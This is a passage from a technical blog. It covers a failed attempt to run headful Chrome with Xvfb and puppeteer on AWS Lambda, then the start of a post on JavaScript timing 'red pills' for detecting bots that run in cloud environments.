<span class="kd">const</span> <span class="nx">old_tests</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">$eval</span><span class="p">(</span><span class="s1">'#detection-tests'</span><span class="p">,</span> <span class="nx">el</span> <span class="p">=></span> <span class="nx">el</span><span class="p">.</span><span class="nx">textContent</span><span class="p">));</span>
<span class="nx">result</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">({</span>
<span class="nx">new_tests</span><span class="o">:</span> <span class="nx">new_tests</span><span class="p">,</span>
<span class="nx">old_tests</span><span class="o">:</span> <span class="nx">old_tests</span><span class="p">,</span>
<span class="p">},</span> <span class="kc">null</span><span class="p">,</span> <span class="mf">2</span><span class="p">);</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">callback</span><span class="p">(</span><span class="nx">error</span><span class="p">);</span>
<span class="p">}</span> <span class="k">finally</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">browser</span> <span class="o">!==</span> <span class="kc">null</span><span class="p">)</span> <span class="p">{</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">callback</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="nx">result</span><span class="p">);</span>
<span class="p">};</span>
</code></pre></div>
<h3>Build the Container</h3>
<p>We are following the build <a href="https://docs.aws.amazon.com/lambda/latest/dg/images-create.html">instructions here</a>.</p>
<p>First, build the docker image with:</p>
<div class="highlight"><pre><span></span><code>docker build -t headful-test .
</code></pre></div>
<p>In case everything works, get the output: <code>Successfully tagged headful-test:latest</code></p>
<p>Then test the container with:</p>
<div class="highlight"><pre><span></span><code>docker container run headful-test
</code></pre></div>
<h3>Deploy the container to AWS Lambda</h3>
<p>Authenticate the Docker CLI to your Amazon ECR registry.</p>
<p><strong>Update your credentials</strong>:</p>
<ul>
<li>Change the region <code>us-east-1</code> to your AWS region.</li>
<li>Change the AWS account ID <code>123456789012</code> to your AWS ID.</li>
</ul>
<p>First login to AWS</p>
<div class="highlight"><pre><span></span><code>aws ecr get-login-password --region us-east-1 <span class="p">|</span> docker login --username AWS --password-stdin <span class="m">123456789012</span>.dkr.ecr.us-east-1.amazonaws.com
</code></pre></div>
<p>Now we have to create a registry for our docker image: </p>
<div class="highlight"><pre><span></span><code>aws ecr create-repository --repository-name headful-test --image-scanning-configuration <span class="nv">scanOnPush</span><span class="o">=</span><span class="nb">true</span>
</code></pre></div>
<p>Tag your image to match your repository name, and deploy the image to Amazon ECR using the docker push command.</p>
<div class="highlight"><pre><span></span><code>docker tag headful-test:latest <span class="m">123456789012</span>.dkr.ecr.us-east-1.amazonaws.com/headful-test:latest
docker push <span class="m">123456789012</span>.dkr.ecr.us-east-1.amazonaws.com/headful-test:latest
</code></pre></div>
<h3>Google Chrome with Xvfb fails</h3>
<p>However, if we try to run <code>Xvfb</code> with <code>google-chrome-stable</code>, we are not successful in running
it on AWS Lambda Docker.</p>
<p>This is the Dockerfile:</p>
<div class="highlight"><pre><span></span><code><span class="k">FROM</span><span class="w"> </span><span class="s">public.ecr.aws/lambda/nodejs:12</span>
<span class="c"># Install Xvfb</span>
<span class="k">RUN</span><span class="w"> </span>yum update -y <span class="o">&&</span> <span class="se">\</span>
yum install -y bzip2 gtk3 dbus-glib libXt xorg-x11-server-Xvfb ImageMagick xz procps
<span class="c"># Install latest Google Chrome browser</span>
<span class="k">RUN</span><span class="w"> </span>curl -o chrome.rpm https://dl.google.com/linux/direct/google-chrome-stable_current_x86_64.rpm
<span class="k">RUN</span><span class="w"> </span>yum install -y chrome.rpm
<span class="k">RUN</span><span class="w"> </span>mkdir /app
<span class="k">WORKDIR</span><span class="w"> </span><span class="s">/app</span>
<span class="k">COPY</span><span class="w"> </span>package*.json /app/
<span class="k">RUN</span><span class="w"> </span>npm install
<span class="k">COPY</span><span class="w"> </span>run.js /app/
<span class="c"># Required for Xvfb</span>
<span class="k">ENV</span><span class="w"> </span><span class="nv">DISPLAY</span><span class="o">=</span><span class="s2">":99.0"</span>
<span class="k">CMD</span><span class="w"> </span><span class="p">[</span><span class="s2">"/app/run.handler"</span><span class="p">]</span>
</code></pre></div>
<p>And this is <code>run.js</code>:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">chromium</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'chrome-aws-lambda'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">exec</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'child_process'</span><span class="p">).</span><span class="nx">exec</span><span class="p">;</span>
<span class="cm">/**</span>
<span class="cm"> * Executes a shell command and return it as a Promise.</span>
<span class="cm"> * @param cmd {string}</span>
<span class="cm"> * @return {Promise<string>}</span>
<span class="cm"> */</span>
<span class="kd">function</span> <span class="nx">execShellCommand</span><span class="p">(</span><span class="nx">cmd</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">exec</span><span class="p">(</span><span class="nx">cmd</span><span class="p">,</span> <span class="p">(</span><span class="nx">error</span><span class="p">,</span> <span class="nx">stdout</span><span class="p">,</span> <span class="nx">stderr</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">warn</span><span class="p">(</span><span class="nx">error</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">resolve</span><span class="p">(</span><span class="nx">stdout</span><span class="o">?</span> <span class="nx">stdout</span> <span class="o">:</span> <span class="nx">stderr</span><span class="p">);</span>
<span class="p">});</span>
<span class="p">});</span>
<span class="p">}</span>
<span class="nx">exports</span><span class="p">.</span><span class="nx">handler</span> <span class="o">=</span> <span class="k">async</span> <span class="p">(</span><span class="nx">event</span><span class="p">,</span> <span class="nx">context</span><span class="p">,</span> <span class="nx">callback</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="c1">// Attempt to launch Xvfb</span>
<span class="kd">let</span> <span class="nx">output</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">execShellCommand</span><span class="p">(</span><span class="s1">'Xvfb :99 -ac -screen 0 1024x768x24 -nolisten tcp &'</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">output</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">result</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">browser</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">chromium</span><span class="p">.</span><span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span>
<span class="nx">args</span><span class="o">:</span> <span class="nx">chromium</span><span class="p">.</span><span class="nx">args</span><span class="p">,</span>
<span class="nx">defaultViewport</span><span class="o">:</span> <span class="nx">chromium</span><span class="p">.</span><span class="nx">defaultViewport</span><span class="p">,</span>
<span class="nx">executablePath</span><span class="o">:</span> <span class="s1">'google-chrome-stable'</span><span class="p">,</span>
<span class="nx">headless</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span> <span class="c1">// we will use headful chrome</span>
<span class="nx">ignoreHTTPSErrors</span><span class="o">:</span> <span class="kc">true</span><span class="p">,</span>
<span class="p">});</span>
<span class="kd">let</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="nx">event</span><span class="p">.</span><span class="nx">url</span> <span class="o">||</span> <span class="s1">'https://bot.incolumitas.com'</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">waitFor</span><span class="p">(</span><span class="mf">4000</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">new_tests</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">$eval</span><span class="p">(</span><span class="s1">'#new-tests'</span><span class="p">,</span> <span class="nx">el</span> <span class="p">=></span> <span class="nx">el</span><span class="p">.</span><span class="nx">textContent</span><span class="p">));</span>
<span class="kd">const</span> <span class="nx">old_tests</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">$eval</span><span class="p">(</span><span class="s1">'#detection-tests'</span><span class="p">,</span> <span class="nx">el</span> <span class="p">=></span> <span class="nx">el</span><span class="p">.</span><span class="nx">textContent</span><span class="p">));</span>
<span class="nx">result</span> <span class="o">=</span> <span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">({</span>
<span class="nx">new_tests</span><span class="o">:</span> <span class="nx">new_tests</span><span class="p">,</span>
<span class="nx">old_tests</span><span class="o">:</span> <span class="nx">old_tests</span><span class="p">,</span>
<span class="p">},</span> <span class="kc">null</span><span class="p">,</span> <span class="mf">2</span><span class="p">);</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">callback</span><span class="p">(</span><span class="nx">error</span><span class="p">);</span>
<span class="p">}</span> <span class="k">finally</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">browser</span> <span class="o">!==</span> <span class="kc">null</span><span class="p">)</span> <span class="p">{</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">callback</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="nx">result</span><span class="p">);</span>
<span class="p">};</span>
</code></pre></div>
<p>We get the following error message when attempting to run on AWS Lambda:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="nt">"errorType"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Error"</span><span class="p">,</span><span class="w"></span>
<span class="nt">"errorMessage"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Failed to launch the browser process!\nmkdir: cannot create directory ‘/.local’: Read-only file system\ntouch: cannot touch ‘/.local/share/applications/mimeapps.list’: No such file or directory\n/usr/bin//google-chrome-stable: line 45: /dev/fd/62: No such file or directory\n/usr/bin//google-chrome-stable: line 46: /dev/fd/62: No such file or directory\n[25:25:0123/133757.218681:ERROR:browser_main_loop.cc(585)] Failed to open an X11 connection.\n[25:25:0123/133757.220449:ERROR:browser_main_loop.cc(1438)] Unable to open X display.\n[25:25:0123/133757.555175:ERROR:service_utils.cc(157)] --ignore-gpu-blacklist is deprecated and will be removed in 2020Q4, use --ignore-gpu-blocklist instead.\n\n\nTROUBLESHOOTING: https://github.com/puppeteer/puppeteer/blob/main/docs/troubleshooting.md\n"</span><span class="p">,</span><span class="w"></span>
<span class="nt">"stack"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"></span>
<span class="w"> </span><span class="s2">"Error: Failed to launch the browser process!"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"mkdir: cannot create directory ‘/.local’: Read-only file system"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"touch: cannot touch ‘/.local/share/applications/mimeapps.list’: No such file or directory"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"/usr/bin//google-chrome-stable: line 45: /dev/fd/62: No such file or directory"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"/usr/bin//google-chrome-stable: line 46: /dev/fd/62: No such file or directory"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"[25:25:0123/133757.218681:ERROR:browser_main_loop.cc(585)] Failed to open an X11 connection."</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"[25:25:0123/133757.220449:ERROR:browser_main_loop.cc(1438)] Unable to open X display."</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"[25:25:0123/133757.555175:ERROR:service_utils.cc(157)] --ignore-gpu-blacklist is deprecated and will be removed in 2020Q4, use --ignore-gpu-blocklist instead."</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">"TROUBLESHOOTING: https://github.com/puppeteer/puppeteer/blob/main/docs/troubleshooting.md"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">" at onClose (/app/node_modules/puppeteer-core/lib/cjs/puppeteer/node/BrowserRunner.js:193:20)"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">" at Interface.<anonymous> (/app/node_modules/puppeteer-core/lib/cjs/puppeteer/node/BrowserRunner.js:183:68)"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">" at Interface.emit (events.js:326:22)"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">" at Interface.close (readline.js:416:8)"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">" at Socket.onend (readline.js:194:10)"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">" at Socket.emit (events.js:326:22)"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">" at endReadableNT (_stream_readable.js:1241:12)"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s2">" at processTicksAndRejections (internal/process/task_queues.js:84:21)"</span><span class="w"></span>
<span class="p">]</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Several different things were tried (See resources below), nothing worked.</p>
<h3>Resources & Links</h3>
<p><a href="https://gist.github.com/cpsubrian/3aa40f6f3d6ce2c707b9d8e34c652dcf#gistcomment-3553963">Gist attempting to do the same on Ubuntu 18.04</a>. </p>
<p><a href="https://github.com/aws/aws-lambda-base-images/tree/nodejs12.x">Aws Lambda base images</a></p>
<p><a href="https://acloudguru.com/blog/engineering/packaging-aws-lambda-functions-as-container-images">Some blog article</a></p>
<p><a href="https://aripalo.com/blog/2020/aws-lambda-container-image-support/">Another blog article</a></p>
<p>Some other, related projects:</p>
<p><a href="https://github.com/atlassian/docker-chromium-xvfb/tree/master/images/base">docker-chromium-xvfb</a></p>
<p><a href="https://gallery.ecr.aws/q3b9l9y9/chromium-xvfb-js">chromium-xvfb-js</a></p>
<p><a href="https://github.com/nisaacson/aws-lambda-xvfb">aws-lambda-xvfb</a></p>
<p><a href="https://dev.to/eoinsha/container-image-support-in-aws-lambda-deep-dive-2keh">Container Image Support in AWS Lambda Deep Dive</a></p>
<p><a href="https://github.com/fourTheorem/lambda-image-page-record">Lambda Image Page Recorder</a></p>
<p><a href="https://stackoverflow.com/questions/65429877/aws-lambda-container-running-selenium-with-headless-chrome-works-locally-but-not">A very recent discussion on stack overflow</a></p>Browser Red Pills: Why are you browsing my website from AWS Lambda?2021-01-17T21:21:00+01:002021-01-17T21:21:00+01:00Nikolai Tschachertag:incolumitas.com,2021-01-17:/2021/01/17/detecting-bots-with-browser-red-pills/<p>Advanced bots use modern browsers and automation frameworks such as puppeteer and playwright. It becomes increasingly hard to distinguish bots from real human traffic, therefore, new methods are required.</p><p><strong>Please Note: This blog post is not finished yet. Research is still ongoing.</strong></p>
<h3>Introduction</h3>
<p>Nowadays, advanced web bots become more powerful each passing day. With the help of browser automation frameworks such as <a href="https://github.com/puppeteer/puppeteer">puppeteer</a> and <a href="https://github.com/microsoft/playwright">playwright</a>, fully fledged Chrome browsers are deployed to the cloud and programmed to automate many different work flows that are too tedious and repetitive for normal humans.</p>
<p>Those advanced web bots are employed for many different use cases:</p>
<ul>
<li>Scraping SERP data from Search Engines such as Google, Bing or Baidu</li>
<li>Price Data scraping from sites such as Ebay or Amazon in order to gain an competitive edge</li>
<li>Advertisement Fraud: Make bots click on Advertisement Links and cash in the ad impression payout</li>
<li>Sneaker Bots: Automatically buying highly sought after goods such as limited edition Nike sneakers</li>
<li>Social Media Bots (such as Twitter Bots): Misleading and spreading false information with the aim to manipulate the consuming masses</li>
</ul>
<p>The general tendency is very clear: A lot of behavior in the Internet is completely automated. This trend will most likely prevail and there is a <a href="https://incolumitas.com/pages/BotOrNot/">constant battle between bot programmers and anti-bot companies</a>.</p>
<p>In my humble opinion, as long as bot traffic is not causing Denial of Service issues or leading to any direct damage, it should not be legally sanctioned. After all, public data is public for a reason. So for example: Scraping public data from a site without using excessive bandwith and without causing bursts is okay. On the other hand, influencing people by creating misleading comments is not okay.</p>
<p>Therefore, there is a constant demand for detecting bad bot behavior. The range of available techniques is vast. Mostly however, the detection techniques can be grouped into the following categories:</p>
<ul>
<li>IP Address reputation techniques</li>
<li>Browser Fingerprinting</li>
<li>Browsing Behavioral Analysis</li>
</ul>
<h3>The Idea</h3>
<p>For economical reasons, most bot programmers do not use their own personal computer to run their bots. The reason is obvious: The personal computer does not scale horizontally and it's unpractical to let it run constantly.</p>
<p>Therefore, bot owners usually rent cloud computational resources to host their bots. A popular solution is to automatically <a href="https://github.com/NikolaiT/Crawling-Infrastructure">spawn AWS EC2 instances in a docker swarm</a> and to assign a certain amount of resources to each container.</p>
<p>Another popular approach is to use serverless computation infrastructure such as <a href="https://aws.amazon.com/lambda/">AWS Lambda</a> or Microsoft Azure.</p>
<p>The exact method does not matter. What is common to all approaches: Each crawler gets assigned as little resources as necessary in order to save infrastructure costs.</p>
<p>This is in stark contrast to most human website visitors: Real humans are using their browser on their computer and rendering a website usually takes only a fraction of all available computational resources.</p>
<h3>Motivation</h3>
<p>The motivation to write this blog post originates from a paper from Stanford Professor Dan Boneh and several other researchers. The paper's title is <a href="https://crypto.stanford.edu/~dabo/pubs/abstracts/browserRedPills.html">"Tick Tock: Building Browser Red Pills from Timing Side Channels"</a>. The paper is a really great read and I highly suggest you guys to read it.</p>
<p>In the paper, Boneh et. al try to find browser based techniques using only JavaScript to show that the browser is running in a virtualized environment such as within VirtualBox or VMware.</p>
<p>They propose different JavaScript functions of two different classes:</p>
<ol>
<li><strong>Baseline Operations</strong>: Those classes of algorithms are assumed to take the same execution time on bare metal computational environments as on virtual machines</li>
<li><strong>Differential Operations</strong>: Those algorithms have significant execution times in virtual machines compared to normal machines.</li>
</ol>
<p>The authors propose several techniques for the above two classes of algorithms and they successfully demonstrate that it is possible
to recognize that the Browser is running in a virtual machine with high statistical confidence.</p>
<p>The purpose of this blog post is to take this concept from the above paper and to find algorithms for the two algorithm classes
that are able to tell a normal computing device (such as Laptop, Smartphone, Tablet) apart from generic cloud usage.</p>
<p>Put differently: Due to the restricted computational resources allocated for cloud based web pots, I suspect that it is possible to find certain algorithms that have significant different execution times compared to normal devices usually used by humans.</p>
<h3>Other Researches thinking into the same Direction</h3>
<p><a href="https://antoinevastel.com/">Antoine Vastel</a> wrote in his <a href="https://tel.archives-ouvertes.fr/tel-02343930/document">PhD thesis</a> submitted on 24th October 2019:</p>
<blockquote>
<p>I propose to investigate red pills, sequences of instructions that aim at detecting if a
browser is running in a virtualized environment, for bot detection. Indeed, since crawling
at scale requires a large infrastructure, a significant fraction of crawlers likely runs on
virtual machines from public cloud providers. Ho et al. proposed several red pills
capable of detecting if the host system is a virtual machine from within the browser.</p>
<p>Nevertheless, the paper has been published in 2014 and has not been evaluated on popular
public cloud providers. Moreover, the underlying implementations of some of the APIs
used in the red pills may have evolved, which can impact the accuracy of the red pills.
Thus, I argue there is a need for evaluating these red pills on the main public cloud
providers and developing new red pills techniques.</p>
</blockquote>
<h3>The Targeted Environment</h3>
<p>The goal of this blog article is to detect that a browser is running in serverless cloud infrastructure.
It is assumed that the serverless environment is assigned <code>1500MB</code> of memory. </p>
<p>For simplicity's sake, we will try to detect that a browser is running from withing AWS Lambda. And it should be possible
to distinguish AWS Lambda from at least the following devices:</p>
<ol>
<li>Normal Laptops</li>
<li>Tablets</li>
<li>Smart Phones</li>
</ol>
<p>The above devices must be reasonably modern, let's say not older than 6 years.</p>
<p>So what environmental restrictions does <a href="https://docs.aws.amazon.com/lambda/latest/dg/lambda-runtimes.html">AWS Lambda</a> have?</p>
<p>A good start is to look at the <a href="https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-limits.html">limits of the AWS Lambda Environment</a>.</p>
<p>The essential question we need to ask ourselves: <strong>What is the best way to trigger the AWS Lambda imposed limits with JavaScript without reaching the computational limits on commonly used standard devices to browser the web (Laptop, Tablets, Smartphone)?</strong></p>
<p>It appears that AWS Lambda <a href="https://towardsdatascience.com/why-we-dont-use-lambda-for-serverless-machine-learning-d00038e1b242">does not have good GPU support</a>.</p>
<p>As of 1th December 2020, it is possible to allocate <a href="https://aws.amazon.com/about-aws/whats-new/2020/12/aws-lambda-supports-10gb-memory-6-vcpu-cores-lambda-functions/">up to 10GB of RAM and 6 vCPU cores</a> for Lambda Functions. vCPU cores are allocated proportionally to the amount of RAM (between 128 MB and 10,240 MB).</p>
<h3>Other Detection Methods</h3>
<p>Our goal is to detect that a browser is running from within a serverless cloud infrastructure.</p>
<p>Several fingerprinting sites such as <a href="https://pixelscan.net/">pixelscan.net</a> and <a href="https://browserleaks.com">browserleaks.com</a> give rise to new promising ideas.</p>
<p>There are several other detection methods that come to mind quickly:</p>
<ul>
<li>See if the browser in the cloud <a href="https://browserleaks.com/dns">leaks DNS info</a> that is not configured to run through the proxy </li>
<li>Check if the browser leaks the real IP address via WebRTC</li>
</ul>
<h3>Implementation Idea</h3>
<p>This is the basic algorithm that will be used in this blog post:</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="nx">redpill</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">baseStart</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="nx">baselineOperation</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">baseTime</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">baseStart</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'baseTime: '</span> <span class="o">+</span> <span class="nx">baseTime</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">diffStart</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="nx">differentialOperation</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">diffTime</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">diffStart</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'diffTime: '</span> <span class="o">+</span> <span class="nx">diffTime</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">diffTime</span> <span class="o">/</span> <span class="nx">baseTime</span> <span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<h3>Baseline Operations</h3>
<p>The text baseline writes a random text into the DOM.</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="nx">textBaseline</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">addString</span> <span class="o">=</span> <span class="s2">"Writes lots of text:"</span>
<span class="nx">addString</span> <span class="o">+=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">floor</span><span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nx">random</span><span class="p">()</span> <span class="o">*</span> <span class="mf">10000</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">pNode</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="s2">"p"</span><span class="p">);</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">pNode</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">500</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">pNode</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">pNode</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">+</span> <span class="nx">addString</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">baseStart</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="nx">textBaseline</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">baseTime</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">baseStart</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'baseTime: '</span> <span class="o">+</span> <span class="nx">baseTime</span><span class="p">);</span>
</code></pre></div>
<p>The memory baseline. This algorithm writes <code>40000</code> times a random number
into the memory and reads it back.</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="nx">memoryBaseline</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">RANDOM</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">floor</span><span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nx">random</span><span class="p">()</span> <span class="o">*</span> <span class="mf">1000000</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">array</span> <span class="o">=</span> <span class="ow">new</span> <span class="nb">Array</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">40000</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">array</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="ow">new</span> <span class="nb">Number</span><span class="p">(</span><span class="nx">RANDOM</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">40000</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">array</span><span class="p">.</span><span class="nx">pop</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">baseStart</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="nx">memoryBaseline</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">baseTime</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">baseStart</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'baseTime: '</span> <span class="o">+</span> <span class="nx">baseTime</span><span class="p">);</span>
</code></pre></div>
<h3>Differential Operations</h3>
<p>Console Write Differential Operation.</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="nx">consoleOperation</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">error_str</span> <span class="o">=</span> <span class="s2">"Error: Writing to Console: "</span> <span class="o">+</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">floor</span><span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nx">random</span><span class="p">()</span> <span class="o">*</span> <span class="mf">10000</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">2000</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">error_str</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">diffStart</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="nx">consoleOperation</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">diffTime</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">diffStart</span><span class="p">;</span>
